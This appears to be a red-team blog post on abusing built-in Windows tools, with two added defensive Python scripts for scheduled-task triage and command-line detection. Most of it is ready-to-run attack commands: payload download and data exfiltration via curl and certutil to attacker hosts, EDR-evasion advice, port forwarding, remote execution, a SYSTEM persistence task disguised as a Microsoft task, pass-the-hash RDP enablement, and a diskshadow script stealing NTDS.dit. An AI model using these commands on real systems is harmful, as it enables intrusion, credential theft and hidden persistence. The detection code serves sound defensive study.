Your effectiveness as a red team operator comes down to how well you can disappear into the noise. Custom binaries get flagged. Noisy C2 beacons get caught. But the CLI tools that admins use every day? Those blend right in.
Windows ships with more useful tools than most people realize. Some are old classics like certutil and netsh. Others are newer additions like native curl and tar that Microsoft quietly added to Windows 10. And then there’s diskshadow, which lets you steal domain databases without tripping the usual alarms.
curl and tar
Starting with Windows 10 version 1803, Microsoft ships real versions of curl.exe and tar.exe. No more PowerShell gymnastics just to make a web request or compress a folder.
curl for transfers
curl is less suspicious than certutil because developers actually use it for legitimate API work.
:: Download a payload
curl.exe -o C:\Windows\Temp\update.exe http://10.10.10.5/beacon.exe
:: Exfiltrate data via POST
curl.exe -X POST -d @C:\Windows\Temp\loot.txt http://10.10.10.5/api/log_upload
tar for compression
Stop writing PowerShell scripts just to zip files.
:: Archive the CEO's documents folder (-a picks the archive format from the
:: extension; without it tar writes a plain tar stream despite the .zip name)
tar.exe -a -cvf C:\Windows\Temp\logs.zip C:\Users\CEO\Documents
certutil
certutil.exe manages certificates, but red teamers repurpose it as a downloader and encoder.
certutil -urlcache -f is one of the most burned signatures in EDR. Only use it when you’re sure monitoring is offline or blind to it.
Download files
certutil.exe -urlcache -split -f http://attacker.com/shell.exe C:\Windows\Temp\shell.exe
Base64 encoding
Useful for smuggling payloads as text files past email filters or upload restrictions.
:: Encode on attacker side
certutil.exe -encode payload.exe payload.txt
:: Decode on victim
certutil.exe -decode payload.txt payload.exe
netsh
netsh lets you reconfigure the networking stack without external tools. Essential for pivoting.
Port forwarding
Forward local port 4455 to the domain controller’s SMB port:
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=0.0.0.0 connectport=445 connectaddress=10.0.0.5
Firewall rules
netsh advfirewall firewall add rule name="OpenPort" dir=in action=allow protocol=TCP localport=4455
wmic
Microsoft is removing WMIC from newer Windows 11 builds in favor of PowerShell CIM cmdlets, but it’s still present on most Windows Server installs.
Remote process execution
wmic /node:"10.0.0.5" process call create "cmd.exe /c whoami > C:\temp\out.txt"
Software removal
wmic product where name="VulnerableApp" call uninstall
findstr
Windows’ answer to grep. Essential for hunting passwords in config files.
:: Search recursively for sensitive terms
findstr /S /I /M "password secret key" *.xml *.config *.txt *.ini
Flags: /S for recursive, /I for case-insensitive, /M to print only filenames.
schtasks
Scheduled tasks survive reboots and can run as SYSTEM. Reliable persistence that looks administrative.
Create a recurring task
schtasks /create /tn "Microsoft\Windows\Recovery\CleanUp" /tr "C:\Windows\Temp\update.exe" /sc minute /mo 30 /ru "SYSTEM"
The task name mimics Microsoft's naming convention. It runs every 30 minutes as SYSTEM.
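The definition that this command registers is saved as XML under %SystemRoot%\System32\Tasks, and that file is where a defender can triage it. The following is an added example, not code from the original post: a Python script that parses a constructed task XML in the Task Scheduler schema and reports the traits just described (a Microsoft-looking task path, a binary in a user-writable directory, SYSTEM as the principal, a short repetition interval). The sample XML, the writable-path hints and the wording of the findings are this example's own assumptions; real task files are UTF-16 and would be read with that encoding before being handed to the parser.

```python
"""Triage a scheduled-task definition for the pattern above: Microsoft-looking
path, binary in a user-writable directory, SYSTEM principal, tight repetition.
Added example, not from the original post. The XML samples are constructed in
the Task Scheduler schema used by the files under %SystemRoot%\\System32\\Tasks;
the path hints and findings wording are this example's own choices."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_PRINCIPALS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
WRITABLE_HINTS = ("\\temp\\", "\\users\\public\\", "\\appdata\\", "\\programdata\\")
# ISO 8601 duration as used in <Interval>, e.g. PT30M or P1DT2H (days/hours/minutes/seconds only)
DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def interval_minutes(iso_duration):
    """Convert a task repetition interval to minutes; None when absent or unparsable."""
    m = DURATION.match(iso_duration or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def triage_task(xml_text):
    """Return the task's path, principal, commands and a findings list.
    An empty findings list means nothing in the task matched the pattern."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    user = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    commands = [e.text or "" for e in root.findall("t:Actions/t:Exec/t:Command", NS)]
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=NS)

    findings = []
    if user.upper() in SYSTEM_PRINCIPALS:
        findings.append("runs as SYSTEM")
    for cmd in commands:
        if any(hint in cmd.lower() for hint in WRITABLE_HINTS):
            findings.append(f"command in user-writable path: {cmd}")
    minutes = interval_minutes(interval)
    if minutes is not None and minutes <= 60:
        findings.append(f"repeats every {minutes:g} minutes")
    # A Microsoft-looking path only matters together with another finding:
    # thousands of legitimate tasks live under \Microsoft\Windows\.
    if findings and uri.lower().startswith("\\microsoft\\windows\\"):
        findings.append("filed under the Microsoft task tree")
    return {"uri": uri, "user": user, "commands": commands, "findings": findings}


# Constructed sample modelled on the schtasks command above.
SUSPECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Recovery\CleanUp</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Windows\Temp\update.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign sample: a vendor updater running daily as a service account
# from Program Files, which should produce no findings.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ExampleVendor\Updater</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><UserId>CORP\svc_updater</UserId><LogonType>Password</LogonType></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\ExampleVendor\updater.exe</Command><Arguments>/quiet</Arguments></Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for label, xml_text in (("suspect", SUSPECT_TASK), ("benign", BENIGN_TASK)):
        result = triage_task(xml_text)
        print(f"{label}: {result['uri']} as {result['user']}")
        for finding in result["findings"] or ["no findings"]:
            print(f"  - {finding}")
```

Pointing the script at every file under the Tasks directory gives a quick inventory; the Microsoft-tree check is deliberately conditional on another finding, otherwise the legitimate tasks that fill that tree would drown the result.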
reg
When PowerShell isn’t available, reg handles direct registry manipulation.
Enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Don't forget to open the firewall with netsh.
Enable pass-the-hash for RDP
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
diskshadow
vssadmin logs Event ID 216, which most SIEMs flag. diskshadow.exe can script Volume Shadow Copies with less noise, perfect for stealing NTDS.dit.
Create shadow.txt:
set context persistent nowriters
add volume c: alias shadow_c
create
expose %shadow_c% z:
exec "cmd.exe /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit"
delete shadows volume %shadow_c%
reset
Run it:
diskshadow.exe /s shadow.txt
The script creates a shadow copy, mounts it as Z:, copies the AD database, then cleans up. Much quieter than the usual vssadmin approach.
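Every command in this post still leaves a process-creation record carrying its full command line (Sysmon Event ID 1, or Security Event 4688 with command-line auditing enabled), and that record is the simplest place to catch the whole chain. The following is an added example, not code from the original post: a Python rule set that scans constructed command lines mirroring each section above (curl, tar, certutil, netsh, wmic, findstr, schtasks, reg and diskshadow) plus three benign lines that must not fire. The rule names, patterns and severities are this example's own choices, not signatures from any product.

```python
"""Flag the living-off-the-land command lines from this post in process-creation
logs. Added example, not part of the original post. SAMPLE_LOG holds constructed
command lines shaped like the CommandLine field of Sysmon Event ID 1 or Security
Event 4688; rule names, patterns and severities are this example's own."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    severity: str


# Each rule pairs a built-in tool with the argument shape that separates routine
# admin use from the tradecraft above. Case-insensitive because cmd.exe is, and
# tolerant of ".exe" being present or absent.
RULES = [
    Rule("certutil download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\s-f\b", re.I), "high"),
    Rule("certutil decode", re.compile(r"\bcertutil(\.exe)?\b.*\s-(en|de)code\b", re.I), "medium"),
    Rule("curl to drop path", re.compile(r"\bcurl(\.exe)?\b.*\s-o\s+\S*(\\temp\\|\\users\\public\\|\\appdata\\)", re.I), "medium"),
    Rule("curl POST of local file", re.compile(r"\bcurl(\.exe)?\b.*\s-d\s+@", re.I), "medium"),
    Rule("tar of user profile", re.compile(r"\btar(\.exe)?\b.*\s-\w*c\w*\s.*\\users\\", re.I), "low"),
    Rule("netsh portproxy", re.compile(r"\bnetsh\b.*\bportproxy\b.*\badd\b", re.I), "high"),
    Rule("netsh firewall allow", re.compile(r"\bnetsh\b.*\badvfirewall\b.*\badd rule\b.*action=allow", re.I), "medium"),
    Rule("wmic remote process create", re.compile(r"\bwmic\b.*/node:.*\bprocess\s+call\s+create\b", re.I), "high"),
    Rule("findstr for secrets", re.compile(r"\bfindstr\b.*/S\b.*\b(password|secret|key)\b", re.I), "low"),
    Rule("schtasks SYSTEM task", re.compile(r'\bschtasks\b.*/create\b.*(/ru\s+"?system"?|\\temp\\)', re.I), "high"),
    Rule("reg enable RDP", re.compile(r"\breg\b.*\badd\b.*\bfDenyTSConnections\b.*/d\s+0\b", re.I), "medium"),
    Rule("reg RestrictedAdmin", re.compile(r"\breg\b.*\badd\b.*\bDisableRestrictedAdmin\b", re.I), "high"),
    Rule("diskshadow scripted", re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I), "high"),
]


def scan(lines):
    """Return (line_no, rule_name, severity) for every rule hit. A line may match
    several rules; all are reported so an analyst sees the whole chain."""
    hits = []
    for n, line in enumerate(lines, 1):
        for rule in RULES:
            if rule.pattern.search(line):
                hits.append((n, rule.name, rule.severity))
    return hits


def summarize(hits):
    """Count hits per severity, e.g. {"high": 6, "medium": 5, "low": 2}."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for _, _, severity in hits:
        counts[severity] += 1
    return counts


# Constructed command lines: the post's commands in order, then three benign
# ones (routine certutil, curl and tar use) that must not fire.
SAMPLE_LOG = [
    r'certutil.exe -urlcache -split -f http://attacker.com/shell.exe C:\Windows\Temp\shell.exe',
    r'certutil.exe -decode payload.txt payload.exe',
    r'curl.exe -o C:\Windows\Temp\update.exe http://10.10.10.5/beacon.exe',
    r'curl.exe -X POST -d @C:\Windows\Temp\loot.txt http://10.10.10.5/api/log_upload',
    r'tar.exe -cvf C:\Windows\Temp\logs.zip C:\Users\CEO\Documents',
    r'netsh interface portproxy add v4tov4 listenport=4455 listenaddress=0.0.0.0 connectport=445 connectaddress=10.0.0.5',
    r'netsh advfirewall firewall add rule name="OpenPort" dir=in action=allow protocol=TCP localport=4455',
    r'wmic /node:"10.0.0.5" process call create "cmd.exe /c whoami > C:\temp\out.txt"',
    r'findstr /S /I /M "password secret key" *.xml *.config *.txt *.ini',
    r'schtasks /create /tn "Microsoft\Windows\Recovery\CleanUp" /tr "C:\Windows\Temp\update.exe" /sc minute /mo 30 /ru "SYSTEM"',
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f',
    r'diskshadow.exe /s shadow.txt',
    r'certutil.exe -verify C:\certs\server.cer',
    r'curl.exe -s https://api.example.com/health',
    r'tar.exe -xf C:\build\artifacts.tar',
]
BENIGN_COUNT = 3


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for n, name, severity in hits:
        print(f"line {n:2d} [{severity:6s}] {name}: {SAMPLE_LOG[n - 1][:70]}")
    print(summarize(hits))
```

The patterns key on the argument shape rather than on the binary alone, which is what keeps the benign lines quiet: certutil verifying a certificate, curl fetching a health endpoint and tar extracting a build artifact all share a binary with a flagged line but none of its arguments. Severity is a triage aid, not a verdict; a single "low" tar hit on its own is routine, the same hit next to a portproxy and a diskshadow run is not.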
Conclusion
Mastering the Windows CLI isn’t about memorizing flags; it’s about understanding underlying system capabilities. When you use curl for transfers, diskshadow for data theft, and findstr for hunting secrets, you operate within the system’s own logic. This “live off the land” approach is a hallmark of professional red teaming.